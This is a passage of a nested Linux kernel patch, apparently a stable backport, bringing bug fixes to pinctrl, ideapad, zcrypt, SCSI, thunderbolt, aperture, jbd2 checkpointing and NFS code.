+ #include <linux/module.h>
++#include <linux/mutex.h>
+ #include <linux/of_device.h>
+ #include <linux/pinctrl/pinconf-generic.h>
+ #include <linux/pinctrl/pinconf.h>
+@@ -121,7 +122,8 @@ struct rzv2m_pinctrl {
+ 	struct gpio_chip		gpio_chip;
+ 	struct pinctrl_gpio_range	gpio_range;
+ 
+-	spinlock_t			lock;
++	spinlock_t			lock; /* lock read/write registers */
++	struct mutex			mutex; /* serialize adding groups and functions */
+ };
+ 
+ static const unsigned int drv_1_8V_group2_uA[] = { 1800, 3800, 7800, 11000 };
+@@ -320,11 +322,13 @@ static int rzv2m_dt_subnode_to_map(struct pinctrl_dev *pctldev,
+ 		name = np->name;
+ 	}
+ 
++	mutex_lock(&pctrl->mutex);
++
+ 	/* Register a single pin group listing all the pins we read from DT */
+ 	gsel = pinctrl_generic_add_group(pctldev, name, pins, num_pinmux, NULL);
+ 	if (gsel < 0) {
+ 		ret = gsel;
+-		goto done;
++		goto unlock;
+ 	}
+ 
+ 	/*
+@@ -338,6 +342,8 @@ static int rzv2m_dt_subnode_to_map(struct pinctrl_dev *pctldev,
+ 		goto remove_group;
+ 	}
+ 
++	mutex_unlock(&pctrl->mutex);
++
+ 	maps[idx].type = PIN_MAP_TYPE_MUX_GROUP;
+ 	maps[idx].data.mux.group = name;
+ 	maps[idx].data.mux.function = name;
+@@ -349,6 +355,8 @@ static int rzv2m_dt_subnode_to_map(struct pinctrl_dev *pctldev,
+ 
+ remove_group:
+ 	pinctrl_generic_remove_group(pctldev, gsel);
++unlock:
++	mutex_unlock(&pctrl->mutex);
+ done:
+ 	*index = idx;
+ 	kfree(configs);
+@@ -1070,6 +1078,7 @@ static int rzv2m_pinctrl_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	spin_lock_init(&pctrl->lock);
++	mutex_init(&pctrl->mutex);
+ 
+ 	platform_set_drvdata(pdev, pctrl);
+ 
+diff --git a/drivers/platform/x86/ideapad-laptop.c b/drivers/platform/x86/ideapad-laptop.c
+index bd38c7dcae347..de03b8889e9d3 100644
+--- a/drivers/platform/x86/ideapad-laptop.c
++++ b/drivers/platform/x86/ideapad-laptop.c
+@@ -1176,6 +1176,11 @@ static const struct key_entry ideapad_keymap[] = {
+ 	{ KE_IGNORE,	0x03 | IDEAPAD_WMI_KEY },
+ 	/* Customizable Lenovo Hotkey ("star" with 'S' inside) */
+ 	{ KE_KEY,	0x01 | IDEAPAD_WMI_KEY, { KEY_FAVORITES } },
++	{ KE_KEY,	0x04 | IDEAPAD_WMI_KEY, { KEY_SELECTIVE_SCREENSHOT } },
++	/* Lenovo Support */
++	{ KE_KEY,	0x07 | IDEAPAD_WMI_KEY, { KEY_HELP } },
++	{ KE_KEY,	0x0e | IDEAPAD_WMI_KEY, { KEY_PICKUP_PHONE } },
++	{ KE_KEY,	0x0f | IDEAPAD_WMI_KEY, { KEY_HANGUP_PHONE } },
+ 	/* Dark mode toggle */
+ 	{ KE_KEY,	0x13 | IDEAPAD_WMI_KEY, { KEY_PROG1 } },
+ 	/* Sound profile switch */
+diff --git a/drivers/s390/crypto/zcrypt_msgtype6.c b/drivers/s390/crypto/zcrypt_msgtype6.c
+index f99a9ef42116f..84e3ad290f6ba 100644
+--- a/drivers/s390/crypto/zcrypt_msgtype6.c
++++ b/drivers/s390/crypto/zcrypt_msgtype6.c
+@@ -926,8 +926,7 @@ static void zcrypt_msgtype6_receive(struct ap_queue *aq,
+ 		.type = TYPE82_RSP_CODE,
+ 		.reply_code = REP82_ERROR_MACHINE_FAILURE,
+ 	};
+-	struct response_type *resp_type =
+-		(struct response_type *)msg->private;
++	struct response_type *resp_type = msg->private;
+ 	struct type86x_reply *t86r;
+ 	int len;
+ 
+@@ -982,8 +981,7 @@ static void zcrypt_msgtype6_receive_ep11(struct ap_queue *aq,
+ 		.type = TYPE82_RSP_CODE,
+ 		.reply_code = REP82_ERROR_MACHINE_FAILURE,
+ 	};
+-	struct response_type *resp_type =
+-		(struct response_type *)msg->private;
++	struct response_type *resp_type = msg->private;
+ 	struct type86_ep11_reply *t86r;
+ 	int len;
+ 
+@@ -1156,23 +1154,36 @@ static long zcrypt_msgtype6_send_cprb(bool userspace, struct zcrypt_queue *zq,
+ 				      struct ica_xcRB *xcrb,
+ 				      struct ap_message *ap_msg)
+ {
+-	int rc;
+-	struct response_type *rtype = (struct response_type *)(ap_msg->private);
++	struct response_type *rtype = ap_msg->private;
+ 	struct {
+ 		struct type6_hdr hdr;
+ 		struct CPRBX cprbx;
+ 		/* ... more data blocks ... */
+ 	} __packed * msg = ap_msg->msg;
+-
+-	/*
+-	 * Set the queue's reply buffer length minus 128 byte padding
+-	 * as reply limit for the card firmware.
+-	 */
+-	msg->hdr.fromcardlen1 = min_t(unsigned int, msg->hdr.fromcardlen1,
+-				      zq->reply.bufsize - 128);
+-	if (msg->hdr.fromcardlen2)
+-		msg->hdr.fromcardlen2 =
+-			zq->reply.bufsize - msg->hdr.fromcardlen1 - 128;
++	unsigned int max_payload_size;
++	int rc, delta;
++
++	/* calculate maximum payload for this card and msg type */
++	max_payload_size = zq->reply.bufsize - sizeof(struct type86_fmt2_msg);
++
++	/* limit each of the two from fields to the maximum payload size */
++	msg->hdr.fromcardlen1 = min(msg->hdr.fromcardlen1, max_payload_size);
++	msg->hdr.fromcardlen2 = min(msg->hdr.fromcardlen2, max_payload_size);
++
++	/* calculate delta if the sum of both exceeds max payload size */
++	delta = msg->hdr.fromcardlen1 + msg->hdr.fromcardlen2
++		- max_payload_size;
++	if (delta > 0) {
++		/*
++		 * Sum exceeds maximum payload size, prune fromcardlen1
++		 * (always trust fromcardlen2)
++		 */
++		if (delta > msg->hdr.fromcardlen1) {
++			rc = -EINVAL;
++			goto out;
++		}
++		msg->hdr.fromcardlen1 -= delta;
++	}
+ 
+ 	init_completion(&rtype->work);
+ 	rc = ap_queue_message(zq->queue, ap_msg);
+@@ -1243,7 +1254,7 @@ static long zcrypt_msgtype6_send_ep11_cprb(bool userspace, struct zcrypt_queue *
+ {
+ 	int rc;
+ 	unsigned int lfmt;
+-	struct response_type *rtype = (struct response_type *)(ap_msg->private);
++	struct response_type *rtype = ap_msg->private;
+ 	struct {
+ 		struct type6_hdr hdr;
+ 		struct ep11_cprb cprbx;
+@@ -1365,7 +1376,7 @@ static long zcrypt_msgtype6_rng(struct zcrypt_queue *zq,
+ 		short int verb_length;
+ 		short int key_length;
+ 	} __packed * msg = ap_msg->msg;
+-	struct response_type *rtype = (struct response_type *)(ap_msg->private);
++	struct response_type *rtype = ap_msg->private;
+ 	int rc;
+ 
+ 	msg->cprbx.domain = AP_QID_QUEUE(zq->queue->qid);
+diff --git a/drivers/scsi/raid_class.c b/drivers/scsi/raid_class.c
+index 711252e52d8e1..95a86e0dfd77a 100644
+--- a/drivers/scsi/raid_class.c
++++ b/drivers/scsi/raid_class.c
+@@ -209,54 +209,6 @@ raid_attr_ro_state(level);
+ raid_attr_ro_fn(resync);
+ raid_attr_ro_state_fn(state);
+ 
+-static void raid_component_release(struct device *dev)
+-{
+-	struct raid_component *rc =
+-		container_of(dev, struct raid_component, dev);
+-	dev_printk(KERN_ERR, rc->dev.parent, "COMPONENT RELEASE\n");
+-	put_device(rc->dev.parent);
+-	kfree(rc);
+-}
+-
+-int raid_component_add(struct raid_template *r,struct device *raid_dev,
+-		       struct device *component_dev)
+-{
+-	struct device *cdev =
+-		attribute_container_find_class_device(&r->raid_attrs.ac,
+-						      raid_dev);
+-	struct raid_component *rc;
+-	struct raid_data *rd = dev_get_drvdata(cdev);
+-	int err;
+-
+-	rc = kzalloc(sizeof(*rc), GFP_KERNEL);
+-	if (!rc)
+-		return -ENOMEM;
+-
+-	INIT_LIST_HEAD(&rc->node);
+-	device_initialize(&rc->dev);
+-	rc->dev.release = raid_component_release;
+-	rc->dev.parent = get_device(component_dev);
+-	rc->num = rd->component_count++;
+-
+-	dev_set_name(&rc->dev, "component-%d", rc->num);
+-	list_add_tail(&rc->node, &rd->component_list);
+-	rc->dev.class = &raid_class.class;
+-	err = device_add(&rc->dev);
+-	if (err)
+-		goto err_out;
+-
+-	return 0;
+-
+-err_out:
+-	put_device(&rc->dev);
+-	list_del(&rc->node);
+-	rd->component_count--;
+-	put_device(component_dev);
+-	kfree(rc);
+-	return err;
+-}
+-EXPORT_SYMBOL(raid_component_add);
+-
+ struct raid_template *
+ raid_class_attach(struct raid_function_template *ft)
+ {
+diff --git a/drivers/scsi/snic/snic_disc.c b/drivers/scsi/snic/snic_disc.c
+index cd27562ec922e..6c529b37f3b46 100644
+--- a/drivers/scsi/snic/snic_disc.c
++++ b/drivers/scsi/snic/snic_disc.c
+@@ -303,12 +303,11 @@ snic_tgt_create(struct snic *snic, struct snic_tgt_id *tgtid)
+ 			      "Snic Tgt: device_add, with err = %d\n",
+ 			      ret);
+ 
+-		put_device(&tgt->dev);
+ 		put_device(&snic->shost->shost_gendev);
+ 		spin_lock_irqsave(snic->shost->host_lock, flags);
+ 		list_del(&tgt->list);
+ 		spin_unlock_irqrestore(snic->shost->host_lock, flags);
+-		kfree(tgt);
++		put_device(&tgt->dev);
+ 		tgt = NULL;
+ 
+ 		return tgt;
+diff --git a/drivers/thunderbolt/tmu.c b/drivers/thunderbolt/tmu.c
+index 626aca3124b1c..d9544600b3867 100644
+--- a/drivers/thunderbolt/tmu.c
++++ b/drivers/thunderbolt/tmu.c
+@@ -415,7 +415,9 @@ int tb_switch_tmu_disable(struct tb_switch *sw)
+ 		 * uni-directional mode and we don't want to change it's TMU
+ 		 * mode.
+ 		 */
+-		tb_switch_tmu_rate_write(sw, TB_SWITCH_TMU_RATE_OFF);
++		ret = tb_switch_tmu_rate_write(sw, TB_SWITCH_TMU_RATE_OFF);
++		if (ret)
++			return ret;
+ 
+ 		tb_port_tmu_time_sync_disable(up);
+ 		ret = tb_port_tmu_time_sync_disable(down);
+diff --git a/drivers/video/aperture.c b/drivers/video/aperture.c
+index 5c94abdb1ad6d..3e4a1f55f51b3 100644
+--- a/drivers/video/aperture.c
++++ b/drivers/video/aperture.c
+@@ -298,14 +298,6 @@ int aperture_remove_conflicting_devices(resource_size_t base, resource_size_t si
+ 
+ 	aperture_detach_devices(base, size);
+ 
+-	/*
+-	 * If this is the primary adapter, there could be a VGA device
+-	 * that consumes the VGA framebuffer I/O range. Remove this device
+-	 * as well.
+-	 */
+-	if (primary)
+-		aperture_detach_devices(VGA_FB_PHYS_BASE, VGA_FB_PHYS_SIZE);
+-
+ 	return 0;
+ }
+ EXPORT_SYMBOL(aperture_remove_conflicting_devices);
+@@ -344,13 +336,22 @@ int aperture_remove_conflicting_pci_devices(struct pci_dev *pdev, const char *na
+ 		aperture_detach_devices(base, size);
+ 	}
+ 
+-	/*
+-	 * WARNING: Apparently we must kick fbdev drivers before vgacon,
+-	 * otherwise the vga fbdev driver falls over.
+-	 */
+-	ret = vga_remove_vgacon(pdev);
+-	if (ret)
+-		return ret;
++	if (primary) {
++		/*
++		 * If this is the primary adapter, there could be a VGA device
++		 * that consumes the VGA framebuffer I/O range. Remove this
++		 * device as well.
++		 */
++		aperture_detach_devices(VGA_FB_PHYS_BASE, VGA_FB_PHYS_SIZE);
++
++		/*
++		 * WARNING: Apparently we must kick fbdev drivers before vgacon,
++		 * otherwise the vga fbdev driver falls over.
++		 */
++		ret = vga_remove_vgacon(pdev);
++		if (ret)
++			return ret;
++	}
+ 
+ 	return 0;
+ 
+diff --git a/drivers/video/fbdev/aty/radeon_base.c b/drivers/video/fbdev/aty/radeon_base.c
+index 8b28c9bddd974..50c384ce28837 100644
+--- a/drivers/video/fbdev/aty/radeon_base.c
++++ b/drivers/video/fbdev/aty/radeon_base.c
+@@ -2238,14 +2238,6 @@ static const struct bin_attribute edid2_attr = {
+ 	.read	= radeon_show_edid2,
+ };
+ 
+-static int radeon_kick_out_firmware_fb(struct pci_dev *pdev)
+-{
+-	resource_size_t base = pci_resource_start(pdev, 0);
+-	resource_size_t size = pci_resource_len(pdev, 0);
+-
+-	return aperture_remove_conflicting_devices(base, size, false, KBUILD_MODNAME);
+-}
+-
+ static int radeonfb_pci_register(struct pci_dev *pdev,
+ 				 const struct pci_device_id *ent)
+ {
+@@ -2296,7 +2288,7 @@ static int radeonfb_pci_register(struct pci_dev *pdev,
+ 	rinfo->fb_base_phys = pci_resource_start (pdev, 0);
+ 	rinfo->mmio_base_phys = pci_resource_start (pdev, 2);
+ 
+-	ret = radeon_kick_out_firmware_fb(pdev);
++	ret = aperture_remove_conflicting_pci_devices(pdev, KBUILD_MODNAME);
+ 	if (ret)
+ 		goto err_release_fb;
+ 
+diff --git a/fs/attr.c b/fs/attr.c
+index b45f30e516fad..9b9a70e0cc54f 100644
+--- a/fs/attr.c
++++ b/fs/attr.c
+@@ -47,6 +47,7 @@ int setattr_should_drop_sgid(struct user_namespace *mnt_userns,
+ 		return ATTR_KILL_SGID;
+ 	return 0;
+ }
++EXPORT_SYMBOL(setattr_should_drop_sgid);
+ 
+ /**
+  * setattr_should_drop_suidgid - determine whether the set{g,u}id bit needs to
+diff --git a/fs/internal.h b/fs/internal.h
+index 46caa33373a48..42df013f7fe76 100644
+--- a/fs/internal.h
++++ b/fs/internal.h
+@@ -242,5 +242,3 @@ ssize_t __kernel_write_iter(struct file *file, struct iov_iter *from, loff_t *po
+ /*
+  * fs/attr.c
+  */
+-int setattr_should_drop_sgid(struct user_namespace *mnt_userns,
+-			     const struct inode *inode);
+diff --git a/fs/jbd2/checkpoint.c b/fs/jbd2/checkpoint.c
+index c4e0da6db7195..9ec91017a7f3c 100644
+--- a/fs/jbd2/checkpoint.c
++++ b/fs/jbd2/checkpoint.c
+@@ -27,7 +27,7 @@
+  *
+  * Called with j_list_lock held.
+  */
+-static inline void __buffer_unlink_first(struct journal_head *jh)
++static inline void __buffer_unlink(struct journal_head *jh)
+ {
+ 	transaction_t *transaction = jh->b_cp_transaction;
+ 
+@@ -40,23 +40,6 @@ static inline void __buffer_unlink_first(struct journal_head *jh)
+ 	}
+ }
+ 
+-/*
+- * Unlink a buffer from a transaction checkpoint(io) list.
+- *
+- * Called with j_list_lock held.
+- */
+-static inline void __buffer_unlink(struct journal_head *jh)
+-{
+-	transaction_t *transaction = jh->b_cp_transaction;
+-
+-	__buffer_unlink_first(jh);
+-	if (transaction->t_checkpoint_io_list == jh) {
+-		transaction->t_checkpoint_io_list = jh->b_cpnext;
+-		if (transaction->t_checkpoint_io_list == jh)
+-			transaction->t_checkpoint_io_list = NULL;
+-	}
+-}
+-
+ /*
+  * Check a checkpoint buffer could be release or not.
+  *
+@@ -366,50 +349,10 @@ int jbd2_cleanup_journal_tail(journal_t *journal)
+ 
+ /* Checkpoint list management */
+ 
+-/*
+- * journal_clean_one_cp_list
+- *
+- * Find all the written-back checkpoint buffers in the given list and
+- * release them. If 'destroy' is set, clean all buffers unconditionally.
+- *
+- * Called with j_list_lock held.
+- * Returns 1 if we freed the transaction, 0 otherwise.
+- */
+-static int journal_clean_one_cp_list(struct journal_head *jh, bool destroy)
+-{
+-	struct journal_head *last_jh;
+-	struct journal_head *next_jh = jh;
+-
+-	if (!jh)
+-		return 0;
+-
+-	last_jh = jh->b_cpprev;
+-	do {
+-		jh = next_jh;
+-		next_jh = jh->b_cpnext;
+-
+-		if (!destroy && __cp_buffer_busy(jh))
+-			return 0;
+-
+-		if (__jbd2_journal_remove_checkpoint(jh))
+-			return 1;
+-		/*
+-		 * This function only frees up some memory
+-		 * if possible so we dont have an obligation
+-		 * to finish processing. Bail out if preemption
+-		 * requested:
+-		 */
+-		if (need_resched())
+-			return 0;
+-	} while (jh != last_jh);
+-
+-	return 0;
+-}
+-
+ /*
+  * journal_shrink_one_cp_list
+  *
+- * Find 'nr_to_scan' written-back checkpoint buffers in the given list
++ * Find all the written-back checkpoint buffers in the given list
+  * and try to release them. If the whole transaction is released, set
+  * the 'released' parameter. Return the number of released checkpointed
+  * buffers.
+@@ -417,15 +360,15 @@ static int journal_clean_one_cp_list(struct journal_head *jh, bool destroy)
+  * Called with j_list_lock held.
+  */
+ static unsigned long journal_shrink_one_cp_list(struct journal_head *jh,
+-						unsigned long *nr_to_scan,
+-						bool *released)
++						bool destroy, bool *released)
+ {
+ 	struct journal_head *last_jh;
+ 	struct journal_head *next_jh = jh;
+ 	unsigned long nr_freed = 0;
+ 	int ret;
+ 
+-	if (!jh || *nr_to_scan == 0)
++	*released = false;
++	if (!jh)
+ 		return 0;
+ 
+ 	last_jh = jh->b_cpprev;
+@@ -433,12 +376,15 @@ static unsigned long journal_shrink_one_cp_list(struct journal_head *jh,
+ 		jh = next_jh;
+ 		next_jh = jh->b_cpnext;
+ 
+-		(*nr_to_scan)--;
+-		if (__cp_buffer_busy(jh))
+-			continue;
++		if (destroy) {
++			ret = __jbd2_journal_remove_checkpoint(jh);
++		} else {
++			ret = jbd2_journal_try_remove_checkpoint(jh);
++			if (ret < 0)
++				continue;
++		}
+ 
+ 		nr_freed++;
+-		ret = __jbd2_journal_remove_checkpoint(jh);
+ 		if (ret) {
+ 			*released = true;
+ 			break;
+@@ -446,7 +392,7 @@ static unsigned long journal_shrink_one_cp_list(struct journal_head *jh,
+ 
+ 		if (need_resched())
+ 			break;
+-	} while (jh != last_jh && *nr_to_scan);
++	} while (jh != last_jh);
+ 
+ 	return nr_freed;
+ }
+@@ -464,11 +410,11 @@ unsigned long jbd2_journal_shrink_checkpoint_list(journal_t *journal,
+ 						  unsigned long *nr_to_scan)
+ {
+ 	transaction_t *transaction, *last_transaction, *next_transaction;
+-	bool released;
++	bool __maybe_unused released;
+ 	tid_t first_tid = 0, last_tid = 0, next_tid = 0;
+ 	tid_t tid = 0;
+ 	unsigned long nr_freed = 0;
+-	unsigned long nr_scanned = *nr_to_scan;
++	unsigned long freed;
+ 
+ again:
+ 	spin_lock(&journal->j_list_lock);
+@@ -497,19 +443,11 @@ again:
+ 		transaction = next_transaction;
+ 		next_transaction = transaction->t_cpnext;
+ 		tid = transaction->t_tid;
+-		released = false;
+ 
+-		nr_freed += journal_shrink_one_cp_list(transaction->t_checkpoint_list,
+-						       nr_to_scan, &released);
+-		if (*nr_to_scan == 0)
+-			break;
+-		if (need_resched() || spin_needbreak(&journal->j_list_lock))
+-			break;
+-		if (released)
+-			continue;
+-
+-		nr_freed += journal_shrink_one_cp_list(transaction->t_checkpoint_io_list,
+-						       nr_to_scan, &released);
++		freed = journal_shrink_one_cp_list(transaction->t_checkpoint_list,
++						   false, &released);
++		nr_freed += freed;
++		(*nr_to_scan) -= min(*nr_to_scan, freed);
+ 		if (*nr_to_scan == 0)
+ 			break;
+ 		if (need_resched() || spin_needbreak(&journal->j_list_lock))
+@@ -530,9 +468,8 @@ again:
+ 	if (*nr_to_scan && next_tid)
+ 		goto again;
+ out:
+-	nr_scanned -= *nr_to_scan;
+ 	trace_jbd2_shrink_checkpoint_list(journal, first_tid, tid, last_tid,
+-					  nr_freed, nr_scanned, next_tid);
++					  nr_freed, next_tid);
+ 
+ 	return nr_freed;
+ }
+@@ -548,7 +485,7 @@ out:
+ void __jbd2_journal_clean_checkpoint_list(journal_t *journal, bool destroy)
+ {
+ 	transaction_t *transaction, *last_transaction, *next_transaction;
+-	int ret;
++	bool released;
+ 
+ 	transaction = journal->j_checkpoint_transactions;
+ 	if (!transaction)
+@@ -559,8 +496,8 @@ void __jbd2_journal_clean_checkpoint_list(journal_t *journal, bool destroy)
+ 	do {
+ 		transaction = next_transaction;
+ 		next_transaction = transaction->t_cpnext;
+-		ret = journal_clean_one_cp_list(transaction->t_checkpoint_list,
+-						destroy);
++		journal_shrink_one_cp_list(transaction->t_checkpoint_list,
++					   destroy, &released);
+ 		/*
+ 		 * This function only frees up some memory if possible so we
+ 		 * dont have an obligation to finish processing. Bail out if
+@@ -568,23 +505,12 @@ void __jbd2_journal_clean_checkpoint_list(journal_t *journal, bool destroy)
+ 		 */
+ 		if (need_resched())
+ 			return;
+-		if (ret)
+-			continue;
+-		/*
+-		 * It is essential that we are as careful as in the case of
+-		 * t_checkpoint_list with removing the buffer from the list as
+-		 * we can possibly see not yet submitted buffers on io_list
+-		 */
+-		ret = journal_clean_one_cp_list(transaction->
+-				t_checkpoint_io_list, destroy);
+-		if (need_resched())
+-			return;
+ 		/*
+ 		 * Stop scanning if we couldn't free the transaction. This
+ 		 * avoids pointless scanning of transactions which still
+ 		 * weren't checkpointed.
+ 		 */
+-		if (!ret)
++		if (!released)
+ 			return;
+ 	} while (transaction != last_transaction);
+ }
+@@ -663,7 +589,7 @@ int __jbd2_journal_remove_checkpoint(struct journal_head *jh)
+ 	jbd2_journal_put_journal_head(jh);
+ 
+ 	/* Is this transaction empty? */
+-	if (transaction->t_checkpoint_list || transaction->t_checkpoint_io_list)
++	if (transaction->t_checkpoint_list)
+ 		return 0;
+ 
+ 	/*
+@@ -694,6 +620,34 @@ int __jbd2_journal_remove_checkpoint(struct journal_head *jh)
+ 	return 1;
+ }
+ 
++/*
++ * Check the checkpoint buffer and try to remove it from the checkpoint
++ * list if it's clean. Returns -EBUSY if it is not clean, returns 1 if
++ * it frees the transaction, 0 otherwise.
++ *
++ * This function is called with j_list_lock held.
++ */
++int jbd2_journal_try_remove_checkpoint(struct journal_head *jh)
++{
++	struct buffer_head *bh = jh2bh(jh);
++
++	if (!trylock_buffer(bh))
++		return -EBUSY;
++	if (buffer_dirty(bh)) {
++		unlock_buffer(bh);
++		return -EBUSY;
++	}
++	unlock_buffer(bh);
++
++	/*
++	 * Buffer is clean and the IO has finished (we held the buffer
++	 * lock) so the checkpoint is done. We can safely remove the
++	 * buffer from this transaction.
++	 */
++	JBUFFER_TRACE(jh, "remove from checkpoint list");
++	return __jbd2_journal_remove_checkpoint(jh);
++}
++
+ /*
+  * journal_insert_checkpoint: put a committed buffer onto a checkpoint
+  * list so that we know when it is safe to clean the transaction out of
+@@ -755,7 +709,6 @@ void __jbd2_journal_drop_transaction(journal_t *journal, transaction_t *transact
+ 	J_ASSERT(transaction->t_forget == NULL);
+ 	J_ASSERT(transaction->t_shadow_list == NULL);
+ 	J_ASSERT(transaction->t_checkpoint_list == NULL);
+-	J_ASSERT(transaction->t_checkpoint_io_list == NULL);
+ 	J_ASSERT(atomic_read(&transaction->t_updates) == 0);
+ 	J_ASSERT(journal->j_committing_transaction != transaction);
+ 	J_ASSERT(journal->j_running_transaction != transaction);
+diff --git a/fs/jbd2/commit.c b/fs/jbd2/commit.c
+index 885a7a6cc53e6..f1d9db6686e31 100644
+--- a/fs/jbd2/commit.c
++++ b/fs/jbd2/commit.c
+@@ -1171,8 +1171,7 @@ restart_loop:
+ 	spin_lock(&journal->j_list_lock);
+ 	commit_transaction->t_state = T_FINISHED;
+ 	/* Check if the transaction can be dropped now that we are finished */
+-	if (commit_transaction->t_checkpoint_list == NULL &&
+-	    commit_transaction->t_checkpoint_io_list == NULL) {
++	if (commit_transaction->t_checkpoint_list == NULL) {
+ 		__jbd2_journal_drop_transaction(journal, commit_transaction);
+ 		jbd2_journal_free_transaction(commit_transaction);
+ 	}
+diff --git a/fs/jbd2/transaction.c b/fs/jbd2/transaction.c
+index 18611241f4513..6ef5022949c46 100644
+--- a/fs/jbd2/transaction.c
++++ b/fs/jbd2/transaction.c
+@@ -1784,8 +1784,7 @@ int jbd2_journal_forget(handle_t *handle, struct buffer_head *bh)
+ 		 * Otherwise, if the buffer has been written to disk,
+ 		 * it is safe to remove the checkpoint and drop it.
+ 		 */
+-		if (!buffer_dirty(bh)) {
+-			__jbd2_journal_remove_checkpoint(jh);
++		if (jbd2_journal_try_remove_checkpoint(jh) >= 0) {
+ 			spin_unlock(&journal->j_list_lock);
+ 			goto drop;
+ 		}
+@@ -2112,20 +2111,14 @@ __journal_try_to_free_buffer(journal_t *journal, struct buffer_head *bh)
+ 
+ 	jh = bh2jh(bh);
+ 
+-	if (buffer_locked(bh) || buffer_dirty(bh))
+-		goto out;
+-
+ 	if (jh->b_next_transaction != NULL || jh->b_transaction != NULL)
+-		goto out;
++		return;
+ 
+ 	spin_lock(&journal->j_list_lock);
+-	if (jh->b_cp_transaction != NULL) {
+-		/* written-back checkpointed metadata buffer */
+-		JBUFFER_TRACE(jh, "remove from checkpoint list");
+-		__jbd2_journal_remove_checkpoint(jh);
+-	}
++	/* Remove written-back checkpointed metadata buffer */
++	if (jh->b_cp_transaction != NULL)
++		jbd2_journal_try_remove_checkpoint(jh);
+ 	spin_unlock(&journal->j_list_lock);
+-out:
+ 	return;
+ }
+ 
+diff --git a/fs/nfs/direct.c b/fs/nfs/direct.c
+index 1707f46b1335c..cf34d0c309459 100644
+--- a/fs/nfs/direct.c
++++ b/fs/nfs/direct.c
+@@ -474,20 +474,26 @@ out:
+ 	return result;
+ }
+ 
+-static void
+-nfs_direct_join_group(struct list_head *list, struct inode *inode)
++static void nfs_direct_join_group(struct list_head *list, struct inode *inode)
+ {
+-	struct nfs_page *req, *next;
++	struct nfs_page *req, *subreq;
+ 
+ 	list_for_each_entry(req, list, wb_list) {
+-		if (req->wb_head != req || req->wb_this_page == req)
++		if (req->wb_head != req)
+ 			continue;
+-		for (next = req->wb_this_page;
+-				next != req->wb_head;
+-				next = next->wb_this_page) {
+-			nfs_list_remove_request(next);
+-			nfs_release_request(next);
+-		}
++		subreq = req->wb_this_page;
++		if (subreq == req)
++			continue;
++		do {
++			/*
++			 * Remove subrequests from this list before freeing
++			 * them in the call to nfs_join_page_group().
++			 */
++			if (!list_empty(&subreq->wb_list)) {
++				nfs_list_remove_request(subreq);
++				nfs_release_request(subreq);
++			}
++		} while ((subreq = subreq->wb_this_page) != req);
+ 		nfs_join_page_group(req, inode);
+ 	}
+ }
+diff --git a/fs/nfs/inode.c b/fs/nfs/inode.c
+index 6b2cfa59a1a2b..e0c1fb98f907a 100644
+--- a/fs/nfs/inode.c
++++ b/fs/nfs/inode.c
+@@ -717,9 +717,7 @@ void nfs_setattr_update_inode(struct inode *inode, struct iattr *attr,
+ 		if ((attr->ia_valid & ATTR_KILL_SUID) != 0 &&
+ 		    inode->i_mode & S_ISUID)
+ 			inode->i_mode &= ~S_ISUID;
+-		if ((attr->ia_valid & ATTR_KILL_SGID) != 0 &&
+-		    (inode->i_mode & (S_ISGID | S_IXGRP)) ==
+-		     (S_ISGID | S_IXGRP))
++		if (setattr_should_drop_sgid(&init_user_ns, inode))
+ 			inode->i_mode &= ~S_ISGID;
+ 		if ((attr->ia_valid & ATTR_MODE) != 0) {
+ 			int mode = attr->ia_mode & S_IALLUGO;
+diff --git a/fs/nfs/nfs42proc.c b/fs/nfs/nfs42proc.c
+index ecb428512fe1a..7c33bba179d2f 100644
+--- a/fs/nfs/nfs42proc.c
++++ b/fs/nfs/nfs42proc.c
+@@ -1359,7 +1359,6 @@ ssize_t nfs42_proc_getxattr(struct inode *inode, const char *name,
+ 	for (i = 0; i < np; i++) {
+ 		pages[i] = alloc_page(GFP_KERNEL);
+ 		if (!pages[i]) {
+-			np = i + 1;
+ 			err = -ENOMEM;
+ 			goto out;
+ 		}
+@@ -1383,8 +1382,8 @@ ssize_t nfs42_proc_getxattr(struct inode *inode, const char *name,
+ 	} while (exception.retry);
+ 
+ out:
+-	while (--np >= 0)
+-		__free_page(pages[np]);
++	while (--i >= 0)
++		__free_page(pages[i]);
+ 	kfree(pages);
+ 
+ 	return err;
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index 177cb7b089b9a..1044305e77996 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -5995,9 +5995,8 @@ static ssize_t __nfs4_get_acl_uncached(struct inode *inode, void *buf,
+ out_ok:
+ 	ret = res.acl_len;
+ out_free:
+-	for (i = 0; i < npages; i++)
+-		if (pages[i])
+-			__free_page(pages[i]);
++	while (--i >= 0)
++		__free_page(pages[i]);
+ 	if (res.acl_scratch)
+ 		__free_page(res.acl_scratch);
+ 	kfree(pages);
+@@ -7171,8 +7170,15 @@ static void nfs4_lock_done(struct rpc_task *task, void *calldata)
+ 		} else if (!nfs4_update_lock_stateid(lsp, &data->res.stateid))
+ 			goto out_restart;
+ 		break;
+-	case -NFS4ERR_BAD_STATEID:
+ 	case -NFS4ERR_OLD_STATEID:
++		if (data->arg.new_lock_owner != 0 &&
++			nfs4_refresh_open_old_stateid(&data->arg.open_stateid,
++					lsp->ls_state))
++			goto out_restart;
++		if (nfs4_refresh_lock_old_stateid(&data->arg.lock_stateid, lsp))
++			goto out_restart;
++		fallthrough;
++	case -NFS4ERR_BAD_STATEID:
+ 	case -NFS4ERR_STALE_STATEID:
+ 	case -NFS4ERR_EXPIRED:
+ 		if (data->arg.new_lock_owner != 0) {
+diff --git a/fs/nfsd/nfs4state.c b/fs/nfsd/nfs4state.c
+index c5dc0cd6f7031..96714e105d7bf 100644
+--- a/fs/nfsd/nfs4state.c
++++ b/fs/nfsd/nfs4state.c
+@@ -1368,9 +1368,9 @@ static void revoke_delegation(struct nfs4_delegation *dp)
+ 	WARN_ON(!list_empty(&dp->dl_recall_lru));
+ 
+ 	if (clp->cl_minorversion) {
++		spin_lock(&clp->cl_lock);
+ 		dp->dl_stid.sc_type = NFS4_REVOKED_DELEG_STID;
+ 		refcount_inc(&dp->dl_stid.sc_count);
+-		spin_lock(&clp->cl_lock);
+ 		list_add(&dp->dl_recall_lru, &clp->cl_revoked);
+ 		spin_unlock(&clp->cl_lock);
+ 	}
+diff --git a/fs/nfsd/vfs.c b/fs/nfsd/vfs.c
+index 155b34c4683c2..4c11046800ab4 100644
+--- a/fs/nfsd/vfs.c
++++ b/fs/nfsd/vfs.c
+@@ -321,7 +321,9 @@ nfsd_sanitize_attrs(struct inode *inode, struct iattr *iap)
